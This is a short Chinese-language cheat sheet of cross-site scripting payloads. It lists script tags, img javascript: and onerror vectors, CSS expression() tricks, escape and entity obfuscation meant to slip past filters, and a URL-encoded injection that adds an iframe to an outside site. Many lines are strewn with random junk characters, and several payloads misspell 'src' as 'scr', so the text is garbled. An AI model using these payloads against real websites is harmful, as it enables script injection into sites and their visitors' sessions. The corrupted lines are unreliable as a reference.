<script>alert("跨站")</script> (最常用)& R" K7 b8 X' N% }4 W4 R
<img scr=javascript:alert("跨站")></img>
$ d- u+ \" L/ N' f<img scr="javascript: alert(/跨站/)></img>
0 \7 O* V0 \! U9 A<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
" o! S0 g& }# ]/ N. U* t, P<img scr="#" onerror=alert(/跨站/)></img>
4 i# I" @/ r9 E6 U+ D( g% k<img scr="#" style="xss:expression(alert(/xss/));"></img># M" i' G, T) C& B. g* x; i, ^9 ~
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
3 m& p( `: N. i D$ v<img src=vbscript:msgbox ("xss")></img>- y# M* h7 e f5 R5 N
<style> input {left:expression (alert('xss'))}</style>
: g: a1 p O7 B: n: P<div style={left:expression (alert('xss'))}></div>
' T P1 `7 M# \6 O: H2 \<div style={left:exp/* */ression (alert('xss'))}></div>
( k8 n" I) E- v# k, Z) e$ F<div style={left:\0065\0078ression (alert('xss'))}></div>
) J$ Q5 v" b" q+ ?html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 d. M( P5 b; d+ ~
unicode <div style="{left:expRessioN (alert('xss'))}">' x& ?% M5 f% l; W+ b
. ?+ ]5 L; w6 L: v4 `"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
2 ]- C; d: z" U( A3 E) A; ` |